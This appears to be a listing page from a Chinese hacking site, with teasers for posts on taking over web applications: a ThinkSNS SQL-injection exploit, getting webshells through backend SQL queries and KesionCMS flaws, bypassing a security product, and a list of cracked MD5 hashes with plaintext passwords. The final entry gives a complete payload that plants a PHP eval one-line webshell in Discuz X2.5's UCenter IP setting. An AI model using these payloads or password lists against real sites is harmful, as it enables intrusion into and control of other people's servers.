SourceForge被黑客入侵 phpMyadmin被植入后门
2012年9月25日消息,今天微博爆出消息,国外知名下载网站SourceForge韩国CDN节点疑似被入侵,热门下载资源phpMyadmin被植入后门。 SourceForge. net是世界上最大的开源软件开发网站。很多国外非常有用的资源都可以从上面下载。而由于国内目前暂无SourceForge的CDN节点,导致从国内访问下载均是从韩国节点获取数据。对国内用户影响非常大。 国内用户从韩国节点下载...
Thinksns微博系统注入漏洞即后台拿webshell
Exp: https://www.webshell.cc/index.php?app=blog&mod=Index&act=show&id=2211 注入点注入字段 表ts_user `uid` int(11) NOT NULL AUTO_INCREMENT, `email` varchar(255) DEFAULT NULL, `password` varch...
PHP 5.4 内置web服务器
PHP是一种脚本语言,它需要PHP解释器来分析运行PHP文件。当把PHP做为CGI服务Web请求时,它需要被嵌入到某种Web服务器里,最常见的是集成到Apache或IIS里,这就是说,在使用PHP前,你需要安装Apache或IIS,并且正确的配置它们和PHP集成的参数。虽然这种配置已经很规范,文档非常丰富,但我们还是经常在安装Apache和PHP集成时遇到问题,而且,有时候我们只想测试一个简单的P...
找回系统文件夹选项 文件扩展名办法
黑阔们往往去网吧的时候无法找到文件扩展名选项很伤脑筋 下面的两种办法足矣对付! 找回系统文件夹选项: 方法一:组策略 点击“开始→运行”,在运行对话框中输入“gpedit.msc”命令,点击“确定”按钮后,弹出“组策略”编辑对话框,依次展开“本地计算机策略→用户配置→管理模板→Windows组件→Windows资源管理器”,然后在右侧窗口中找到“从‘工具’菜单删除‘文件...
个人收藏的部分收费MD5!
MD5 HASH 84c45962d887564f a66abb5684c45962d887564f08346e8d admin123456 8a1929f5878b794b fbbf0df68a1929f5878b794bbc290f8e 0523213511 fd51ac9e0f2262e4 8720e806fd51ac9e0f2262e47c4e7ddf 06605528808 353acf...
问题ewebeditor编辑器突破安全狗
题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢? 1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了。 2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。 当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去...
利用后台SQL查询语句拿webshell
今天,朋友给了一个比较好玩的后台 有SQL查询功能 在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了 以下拿webshell步骤 第一句代码 create table cmd (a varchar(5...
科讯kesioncms 5.5以下漏洞拿shell方法原理总结
讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增大了拿shell 的难度。下面就个版本拿shell 的方法做一总结。 KesionCMS V3.x和3.x以下版本 网上有0day工具不过没有具体原理,下面就讲一下手工拿shell的方法 关键字:inurl...
御剑 1.5接口修复版本 提供下载
[download id="21"]
discuz X2.5后台拿shell及修复
有管理员帐号及密码。 直接在UCenter IP 地址:里面插入一句话 xxoo\');eval($_POST[a])?>;// 就ok 然后菜刀连接https://www.webshell.cc/config/config_ucenter.php密码a , 测试通过